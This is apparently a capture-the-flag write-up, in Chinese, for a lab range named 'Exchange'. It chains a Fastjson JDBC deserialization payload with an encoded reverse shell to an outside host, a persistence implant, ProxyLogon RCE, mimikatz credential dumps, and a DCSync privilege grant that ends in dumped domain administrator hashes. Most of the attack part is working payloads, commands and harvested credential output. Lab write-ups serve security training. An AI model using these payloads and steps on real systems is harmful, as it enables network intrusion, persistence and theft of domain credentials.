March 19, 2024

春秋云镜 Exchange Writeup

知识点

Fastjson-JDBC ATTACK、Exchange proxylogon RCE、Dsync 攻击、MISC

Flag1

靶场地址:39.99.233.132
上手fscan嗦一把。
image.png

1
2
3
4
5
6
7
8
9
10
11
12
                     fscan version: 1.7.1
start infoscan
(icmp) Target 39.99.233.132 is alive
[*] Icmp alive hosts len is: 1
39.99.233.132:80 open
39.99.233.132:8000 open
39.99.233.132:22 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle:http://39.99.233.132 code:200 len:19813 title:lumia
[*] WebTitle:http://39.99.233.132:8000 code:302 len:0 title:None 跳转url: http://39.99.233.132:8000/login.html
[*] WebTitle:http://39.99.233.132:8000/login.html code:200 len:5662 title:Lumia ERP

发现了华夏ERP开在了8000端口
华夏erp账号密码泄露+后台rce(最新组合漏洞)
[http://39.99.233.132:8000/user/getAllList;.ico](http://39.99.233.132:8000/user/getAllList;.ico)
image.png
这里可以获取1管理员的账号密码,cmd5解密是123456
image.png
获得一组管理员账号密码admin/123456
https://www.cnblogs.com/bmjoker/p/14856437.html
后台搜索界面存在fastjson1.2.55的反序列化,然后题目给的考点是JDBC,去找点poc。
https://su18.org/post/fastjson/#8-fastjson-1268

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
{
"@type": "java.lang.AutoCloseable",
"@type": "com.mysql.jdbc.JDBC4Connection",
"hostToConnectTo": "114.116.119.253",
"portToConnectTo": 3306,
"url": "jdbc:mysql://114.116.119.253:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
"databaseToConnectTo": "test",
"info": {
"@type": "java.util.Properties",
"PORT": "3306",
"statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
"autoDeserialize": "true",
"user": "base64ZGVzZXJfQ0MzMV9iYXNoIC1jIHtlY2hvLFltRnphQ0F0YVNBK0ppQXZaR1YyTDNSamNDOHhNVFF1TVRFMkxqRXhPUzR5TlRNdk56YzNOeUF3UGlZeH18e2Jhc2U2NCwtZH18e2Jhc2gsLWl9",
"PORT.1": "3306",
"HOST.1": "172.20.64.40",
"NUM_HOSTS": "1",
"HOST": "172.20.64.40",
"DBNAME": "test"
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
GET /user/list?search=%7B%0A%09%22%40type%22%3A%20%22java.lang.AutoCloseable%22%2C%0A%09%22%40type%22%3A%20%22com.mysql.jdbc.JDBC4Connection%22%2C%0A%09%22hostToConnectTo%22%3A%20%22114.116.119.253%22%2C%0A%09%22portToConnectTo%22%3A%203308%2C%0A%09%22url%22%3A%20%22jdbc%3Amysql%3A%2F%2F114.116.119.253%3A3308%2Ftest%3FautoDeserialize%3Dtrue%26statementInterceptors%3Dcom.mysql.jdbc.interceptors.ServerStatusDiffInterceptor%22%2C%0A%09%22databaseToConnectTo%22%3A%20%22test%22%2C%0A%09%22info%22%3A%20%7B%0A%09%09%22%40type%22%3A%20%22java.util.Properties%22%2C%0A%09%09%22PORT%22%3A%20%223306%22%2C%0A%09%09%22statementInterceptors%22%3A%20%22com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor%22%2C%0A%09%09%22autoDeserialize%22%3A%20%22true%22%2C%0A%09%09%22user%22%3A%20%22base64ZGVzZXJfQ0MzMV9iYXNoIC1jIHtlY2hvLFltRnphQ0F0YVNBK0ppQXZaR1YyTDNSamNDOHhNVFF1TVRFMkxqRXhPUzR5TlRNdk56YzNOeUF3UGlZeH18e2Jhc2U2NCwtZH18e2Jhc2gsLWl9%22%2C%0A%09%09%22PORT.1%22%3A%20%223306%22%2C%0A%09%09%22HOST.1%22%3A%20%22172.20.64.40%22%2C%0A%09%09%22NUM_HOSTS%22%3A%20%221%22%2C%0A%09%09%22HOST%22%3A%20%22172.20.64.40%22%2C%0A%09%09%22DBNAME%22%3A%20%22test%22%0A%09%7D%0A%7D&currentPage=1&pageSize=10 HTTP/1.1
Host: 39.99.233.132:8000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Edg/118.0.2088.46
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://39.99.233.132:8000/login.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: JSESSIONID=B49FB20B635BD8913377199CAAED066E; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1697723127; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1697724188
If-Modified-Since: Sun, 23 Oct 2022 11:30:06 GMT
Connection: close


image.png
image.png
获取到了一个webshell。接下来咱们想给他持久化一下。我选择上个vshell
先拿个flag
image.png
image.png
然后咱们在vhsell上等待服务器的上线即可。

Flag2

image.png
上线过后我们首先上传个fscan上去进行后渗透。
image.png
image.png

1
2
3
4
5
6
7
8
[*] 172.22.3.9           XIAORANG\XIAORANG-EXC01    Windows Server 2016 Datacenter 14393
[*] WebTitle:http://172.22.3.12:8000 code:302 len:0 title:None 跳转url: http://172.22.3.12:8000/login.html
[*] WebTitle:http://172.22.3.12:8000/login.html code:200 len:5662 title:Lumia ERP
[*] WebTitle:http://172.22.3.9:81 code:403 len:1157 title:403 - 禁止访问: 访问被拒绝。
[*] WebTitle:https://172.22.3.9:8172 code:404 len:0 title:None
[*] WebTitle:http://172.22.3.9 code:403 len:0 title:None
[*] WebTitle:https://172.22.3.9 code:302 len:0 title:None 跳转url: https://172.22.3.9/owa/
[*] WebTitle:https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 code:200 len:28237 title:Outlook

https://172.22.3.9
我们看到了一个Outlook,结合靶机名称考虑的是Exchange的logon写shell的洞
但在这之前我们首先穿一层代理出来先,vshell提供了方便的隧道搭建,我们开一层socks5,然后配置一下自己的proxychains
image.png
配置完毕,咱们掏出exp去打!
https://github.com/hausec/ProxyLogon
python2去用这个exp。
proxychains python2 exchange-rce.py 172.22.3.9 [email protected]
image.png
但是这样始终不方便拿shell。所以启动一下蚁剑
image.png
记得开忽略https证书捏
image.png
然后进一步我们需要做个权限维持。也是上vshell,但是不出网。所以只能用蚁剑来办事情。

Flag4

windows域渗透的流程,首先我们当前用户是一个system高权限账号,是可以直接进行mimiktaz的操作的。先fscan扫一下,然后顺路把mimikatz也传上去
image.png

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
C:\迅雷下载> type 1.log
.#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 2394476 (00000000:0024896c)
Session : RemoteInteractive from 2
User Name : Zhangtong
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2023/10/19 21:46:20
SID : S-1-5-21-533686307-2117412543-4200729784-1147
msv :
[00000003] Primary
* Username : Zhangtong
* Domain : XIAORANG
* NTLM : 22c7f81993e96ac83ac2f3f1903de8b4
* SHA1 : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
* DPAPI : ed14c3c4ef895b1d11b04fb4e56bb83b
tspkg :
wdigest :
* Username : Zhangtong
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : Zhangtong
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 104787 (00000000:00019953)
Session : Service from 0
User Name : Zhangtong
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2023/10/19 21:44:10
SID : S-1-5-21-533686307-2117412543-4200729784-1147
msv :
[00000003] Primary
* Username : Zhangtong
* Domain : XIAORANG
* NTLM : 22c7f81993e96ac83ac2f3f1903de8b4
* SHA1 : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
* DPAPI : ed14c3c4ef895b1d11b04fb4e56bb83b
tspkg :
wdigest :
* Username : Zhangtong
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : Zhangtong
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 104855 (00000000:00019997)
Session : Service from 0
User Name : Zhangtong
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2023/10/19 21:44:10
SID : S-1-5-21-533686307-2117412543-4200729784-1147
msv :
[00000003] Primary
* Username : Zhangtong
* Domain : XIAORANG
* NTLM : 22c7f81993e96ac83ac2f3f1903de8b4
* SHA1 : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
* DPAPI : ed14c3c4ef895b1d11b04fb4e56bb83b
tspkg :
wdigest :
* Username : Zhangtong
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : Zhangtong
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 63573 (00000000:0000f855)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/10/19 21:44:08
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 46c981f71101f966f05c247c73483379
* SHA1 : 3c091d00f75daa08bf846636924b3e11977b38d3
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : f7 78 46 cb 83 85 97 87 68 d8 37 f9 7b d6 85 40 0e 2b 12 2f f3 ba 19 dc f2 6f 3f 45 ff e5 77 bb e9 32 24 95 4f 8d 27 85 83 32 24 f3 23 48 16 ad fc 61 4a 4e 83 61 0f 0b 17 5c eb 82 d6 27 de 64 59 96 0a f3 e0 85 3a a8 d5 b7 3e c1 cc da 4d ed d2 1c 13 26 2a cd 48 f4 34 64 64 5d ed a4 b5 19 0d 3e 62 4b 09 71 73 11 90 ce 4a 69 37 de 53 85 e1 9c be b2 14 33 67 01 9e f8 f3 bc 92 ce 1b b5 40 16 ab b8 a7 f6 7b 32 0a 17 22 71 a4 22 25 c1 f9 84 66 dc fd b9 4f b7 5d 2d d2 6e 23 58 54 c2 55 78 cc 64 8e a3 48 65 f2 dd e5 bf 76 49 c6 7a 1f b2 6a 09 ec 40 c1 a3 83 11 0a 10 12 f8 8f d7 ee ee 8b 81 04 4f b3 5a 6c 63 6a 49 76 71 0a 58 5c 31 f2 2d 97 2d be 8e 84 22 ae 29 10 3a 63 66 17 7d cb 3b 17 7c 4f 8a ff d1 db b0 1e 82 64 e6
ssp :
credman :
Authentication Id : 0 ; 10511454 (00000000:00a0645e)
Session : NetworkCleartext from 0
User Name : HealthMailbox0d5918e
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2023/10/19 22:25:26
SID : S-1-5-21-533686307-2117412543-4200729784-1136
msv :
[00000003] Primary
* Username : HealthMailbox0d5918e
* Domain : XIAORANG
* NTLM : 24ede8bf5898e43b56afa207ee5b42d2
* SHA1 : 5fa54554e61298d10a8aab3565d17cb17d84fb5a
* DPAPI : d3eae48eca56207938fc8ef39add245a
tspkg :
wdigest :
* Username : HealthMailbox0d5918e
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : HealthMailbox0d5918e
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 2328428 (00000000:0023876c)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/10/19 21:46:18
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 46c981f71101f966f05c247c73483379
* SHA1 : 3c091d00f75daa08bf846636924b3e11977b38d3
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : f7 78 46 cb 83 85 97 87 68 d8 37 f9 7b d6 85 40 0e 2b 12 2f f3 ba 19 dc f2 6f 3f 45 ff e5 77 bb e9 32 24 95 4f 8d 27 85 83 32 24 f3 23 48 16 ad fc 61 4a 4e 83 61 0f 0b 17 5c eb 82 d6 27 de 64 59 96 0a f3 e0 85 3a a8 d5 b7 3e c1 cc da 4d ed d2 1c 13 26 2a cd 48 f4 34 64 64 5d ed a4 b5 19 0d 3e 62 4b 09 71 73 11 90 ce 4a 69 37 de 53 85 e1 9c be b2 14 33 67 01 9e f8 f3 bc 92 ce 1b b5 40 16 ab b8 a7 f6 7b 32 0a 17 22 71 a4 22 25 c1 f9 84 66 dc fd b9 4f b7 5d 2d d2 6e 23 58 54 c2 55 78 cc 64 8e a3 48 65 f2 dd e5 bf 76 49 c6 7a 1f b2 6a 09 ec 40 c1 a3 83 11 0a 10 12 f8 8f d7 ee ee 8b 81 04 4f b3 5a 6c 63 6a 49 76 71 0a 58 5c 31 f2 2d 97 2d be 8e 84 22 ae 29 10 3a 63 66 17 7d cb 3b 17 7c 4f 8a ff d1 db b0 1e 82 64 e6
ssp :
credman :
Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2023/10/19 21:44:10
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 63606 (00000000:0000f876)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/10/19 21:44:08
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 9587463cfa3fd1ea760c401e2c52e224
* SHA1 : 162fc915ffccfa73c6f53b3c92f02690ccf7831c
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : 12 ae e6 f2 22 80 c0 a3 cd 84 c9 94 de ef 96 52 79 ff ea 99 f6 9c 67 48 10 08 e7 99 1a fa 51 11 ad b6 c1 79 cc 6d 04 b2 22 01 47 b0 53 b5 7e ff df 04 21 34 ae 7b ee c9 cf b1 c1 d3 c0 63 d3 d7 6a f2 3a 38 83 ac cf d2 93 7b d3 0b bb d6 a5 8d 7c cd f1 77 65 0b 8c 77 dd 98 49 3c 21 f0 5d fc a7 8f c7 e0 5b f7 96 4d d2 46 14 81 8f 4f a7 a4 27 11 09 03 f9 f4 0d ce 71 4d 8d 64 c3 a9 6b 5c 4a 77 ba ac 33 1a 49 60 11 bd 4d b2 1e 98 05 1a c1 03 5b c6 cf 4e 1c d3 83 10 52 51 68 c4 b1 e0 65 c2 36 f3 a6 3f 66 c6 95 8c 3d 47 ab 9b cb 35 bd 53 f0 6f 13 ae 48 28 5e cf 5b ee 45 ce 7f 10 47 aa e6 f0 d3 09 c0 b3 ad ef 24 00 c5 c8 f0 7f a5 06 93 0e f5 a4 2a ec d0 25 96 4d a4 88 d3 55 94 d9 94 81 ef 8b ba 9e 89 b6 36 dc 88 64 8d 96
ssp :
credman :
Authentication Id : 0 ; 22399 (00000000:0000577f)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2023/10/19 21:43:58
SID :
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 46c981f71101f966f05c247c73483379
* SHA1 : 3c091d00f75daa08bf846636924b3e11977b38d3
tspkg :
wdigest :
kerberos :
ssp :
[00000000]
* Username : [email protected]
* Domain : (null)
* Password : &k$@DY98tIt>P.Ydx2!Xl=h(2XWQB}wu9]Xi3RZ=hQyV{0iSp-9?EmAxZf{GY}Dx0cpEv{kGj5OUjq}x(v!_Y_*Ke0kg&{|32}r15W2Lq}oE1H59a-l4N$|55dU#GyyD
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : XIAORANG-EXC01$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2023/10/19 21:43:58
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : xiaorang-exc01$
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : XIAORANG-EXC01$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2023/10/19 21:44:08
SID : S-1-5-20
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 46c981f71101f966f05c247c73483379
* SHA1 : 3c091d00f75daa08bf846636924b3e11977b38d3
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : xiaorang-exc01$
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 10115413 (00000000:009a5955)
Session : NetworkCleartext from 0
User Name : HealthMailbox0d5918e
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2023/10/19 22:24:49
SID : S-1-5-21-533686307-2117412543-4200729784-1136
msv :
[00000003] Primary
* Username : HealthMailbox0d5918e
* Domain : XIAORANG
* NTLM : 24ede8bf5898e43b56afa207ee5b42d2
* SHA1 : 5fa54554e61298d10a8aab3565d17cb17d84fb5a
* DPAPI : d3eae48eca56207938fc8ef39add245a
tspkg :
wdigest :
* Username : HealthMailbox0d5918e
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : HealthMailbox0d5918e
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 9467606 (00000000:009076d6)
Session : Service from 0
User Name : DefaultAppPool
Domain : IIS APPPOOL
Logon Server : (null)
Logon Time : 2023/10/19 22:11:36
SID : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 46c981f71101f966f05c247c73483379
* SHA1 : 3c091d00f75daa08bf846636924b3e11977b38d3
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : f7 78 46 cb 83 85 97 87 68 d8 37 f9 7b d6 85 40 0e 2b 12 2f f3 ba 19 dc f2 6f 3f 45 ff e5 77 bb e9 32 24 95 4f 8d 27 85 83 32 24 f3 23 48 16 ad fc 61 4a 4e 83 61 0f 0b 17 5c eb 82 d6 27 de 64 59 96 0a f3 e0 85 3a a8 d5 b7 3e c1 cc da 4d ed d2 1c 13 26 2a cd 48 f4 34 64 64 5d ed a4 b5 19 0d 3e 62 4b 09 71 73 11 90 ce 4a 69 37 de 53 85 e1 9c be b2 14 33 67 01 9e f8 f3 bc 92 ce 1b b5 40 16 ab b8 a7 f6 7b 32 0a 17 22 71 a4 22 25 c1 f9 84 66 dc fd b9 4f b7 5d 2d d2 6e 23 58 54 c2 55 78 cc 64 8e a3 48 65 f2 dd e5 bf 76 49 c6 7a 1f b2 6a 09 ec 40 c1 a3 83 11 0a 10 12 f8 8f d7 ee ee 8b 81 04 4f b3 5a 6c 63 6a 49 76 71 0a 58 5c 31 f2 2d 97 2d be 8e 84 22 ae 29 10 3a 63 66 17 7d cb 3b 17 7c 4f 8a ff d1 db b0 1e 82 64 e6
ssp :
credman :
Authentication Id : 0 ; 2328450 (00000000:00238782)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/10/19 21:46:18
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 46c981f71101f966f05c247c73483379
* SHA1 : 3c091d00f75daa08bf846636924b3e11977b38d3
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : f7 78 46 cb 83 85 97 87 68 d8 37 f9 7b d6 85 40 0e 2b 12 2f f3 ba 19 dc f2 6f 3f 45 ff e5 77 bb e9 32 24 95 4f 8d 27 85 83 32 24 f3 23 48 16 ad fc 61 4a 4e 83 61 0f 0b 17 5c eb 82 d6 27 de 64 59 96 0a f3 e0 85 3a a8 d5 b7 3e c1 cc da 4d ed d2 1c 13 26 2a cd 48 f4 34 64 64 5d ed a4 b5 19 0d 3e 62 4b 09 71 73 11 90 ce 4a 69 37 de 53 85 e1 9c be b2 14 33 67 01 9e f8 f3 bc 92 ce 1b b5 40 16 ab b8 a7 f6 7b 32 0a 17 22 71 a4 22 25 c1 f9 84 66 dc fd b9 4f b7 5d 2d d2 6e 23 58 54 c2 55 78 cc 64 8e a3 48 65 f2 dd e5 bf 76 49 c6 7a 1f b2 6a 09 ec 40 c1 a3 83 11 0a 10 12 f8 8f d7 ee ee 8b 81 04 4f b3 5a 6c 63 6a 49 76 71 0a 58 5c 31 f2 2d 97 2d be 8e 84 22 ae 29 10 3a 63 66 17 7d cb 3b 17 7c 4f 8a ff d1 db b0 1e 82 64 e6
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2023/10/19 21:44:08
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :

信息被我们dump下来了全部。我们可以获取xiaorang用户的NTML HASH,这一步可以进行pth喷洒攻击
image.png
似乎是因为SMB没开启,不过没关系,这时候就需要用到bloodhound进行一个信息搜集了
sharphound.exe -c all
image.png
拿下来导入bloodhound然后进行分析,等待过程是比较慢的,毕竟neo4j嘛。。

偷一下XZ的图,妈的我的bloodhound上传json文件卡了,真恶心

Dsync Dump

https://github.com/CravateRouge/bloodyAD
用到个方便点的工具,方便利用WriteDacl权限去添加dsync权限进而dump hashes
既然有writedacl权限,那就可以给域内任意用户添加任意dacl权限了,这里给zhangtong用户添加dsync权限,我们现在的机子是XIAORANG-EXC01,是Exchange组的成员,因此也有writedacl权限
image.png
proxychains dacledit.py xiaorang.lab/XIAORANG-EXC01 -hashes :46c981f71101f966f05c247c73483379 -action write -rights DCSync -principal Zhangtong -target-dn 'dc=xiaorang,dc=lab' -dc-ip 172.22.3.2
但我其实不是这样写的。这一波我觉得其实可以直接给当前机子,也就是自身dsync权限,然后用mimikatz直接dump就行了
proxychains dacledit.py xiaorang.lab/XIAORANG-EXC01$ -hashes :46c981f71101f966f05c247c73483379 -action write -rights DCSync -principal XIAORANG-EXC01$ -target-dn 'dc=xiaorang,dc=lab' -dc-ip 172.22.3.2

-hashes 当前机子的hash
-action 行为是添加也就是write
-principal 目标用户
-target-dn 域名
dc-ip 域控的ip

域控的ip我们fscan的结果看到了
image.png
那么接下来用mimikatz直接dump一下捏
mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" >5.log

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
mimikatz # 
C:\迅雷下载> mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" >5.log
C:\迅雷下载> type 5.log
.#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
mimikatz(commandline) # lsadump::dcsync /domain:xiaorang.lab /user:Administrator
[DC] 'xiaorang.lab' will be the domain
[DC] 'XIAORANG-WIN16.xiaorang.lab' will be the DC server
[DC] 'Administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
User Principal Name : [email protected]
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration : 1601/1/1 8:00:00
Password last change : 2023/10/19 21:43:49
Object Security ID : S-1-5-21-533686307-2117412543-4200729784-500
Object Relative ID : 500
Credentials:
Hash NTLM: 7acbc09a6c0efd81bfa7d5a1d4238beb
ntlm- 0: 7acbc09a6c0efd81bfa7d5a1d4238beb
ntlm- 1: 7acbc09a6c0efd81bfa7d5a1d4238beb
ntlm- 2: 7acbc09a6c0efd81bfa7d5a1d4238beb
ntlm- 3: 7acbc09a6c0efd81bfa7d5a1d4238beb
lm - 0: f2ec8e584adb61457cfe4f77ea486895
lm - 1: 0f3223fca69c1d65a67c729a74e20a42
lm - 2: eae2ede2edea9c03fdd0c6e236646d41
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : e5b0c4a82f7fbf0708b67d701a6aa8b0
* Primary:Kerberos-Newer-Keys *
Default Salt : XIAORANG.LABAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : d35b5e1dedca8060e674610041c5095c853724ca50c986c909a955b15fadf630
aes128_hmac (4096) : 8b17084cfa8d1c1d37c13201d68ec0cf
des_cbc_md5 (4096) : d9c4a4d5348f0d73
OldCredentials
aes256_hmac (4096) : d35b5e1dedca8060e674610041c5095c853724ca50c986c909a955b15fadf630
aes128_hmac (4096) : 8b17084cfa8d1c1d37c13201d68ec0cf
des_cbc_md5 (4096) : d9c4a4d5348f0d73
OlderCredentials
aes256_hmac (4096) : d35b5e1dedca8060e674610041c5095c853724ca50c986c909a955b15fadf630
aes128_hmac (4096) : 8b17084cfa8d1c1d37c13201d68ec0cf
des_cbc_md5 (4096) : d9c4a4d5348f0d73
* Primary:Kerberos *
Default Salt : XIAORANG.LABAdministrator
Credentials
des_cbc_md5 : d9c4a4d5348f0d73
OldCredentials
des_cbc_md5 : d9c4a4d5348f0d73
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
01 e09c3dfc9c6efe284d857c058dc1db55
02 fbf9a181b276a735c3aa2dadd77e134c
03 abfd5c1956c049d4790c90d77e679564
04 e09c3dfc9c6efe284d857c058dc1db55
05 01b9558961ba8e6d3e242ad0a573daaf
06 421fafa7082865ce50c3d8f5a09172aa
07 3b33abf4513bdc142aeff14dcc44bb6c
08 67801cafacc256dbffa5b6550f3eb98d
09 eca500dc4bf4100b73d1adcbdc4fdef6
10 dc6a3d5522ca864a8668b3c1a49255b1
11 d692f02402a8f38e6c242af609bedc45
12 67801cafacc256dbffa5b6550f3eb98d
13 2c4c7abb5884d0554c33a355a9f7c21e
14 299c1210a681d700eb7840ce54808648
15 94dd87c64e01028a3d5f07af9ea9aa76
16 36e79452fc63c6af5f08f158fb788622
17 afc9d511a5dfcf8e41fa37f38ecc6af7
18 fd2dbb5552b731a4a78c103dfe64e3f1
19 db7b0bbeb4937dcb8ce461265a10b21e
20 7358a3b9387c41e5da0b7f2d769fe5d2
21 b9d78e29e532a095144a1eb0c829b255
22 192b18e2b0cd9b907936385b8bda7b36
23 ba08bed581e1da740999962c6a39ae91
24 f4afecc454a2b6decc5e9a934ba5db4b
25 f095e8a655cad918f5606bb764daea95
26 702cbf78e979f2914a877d8c53f18862
27 bbca37af1d189426db4899dc8f750150
28 ef2d30ad6765b5f13c65ade611e33312
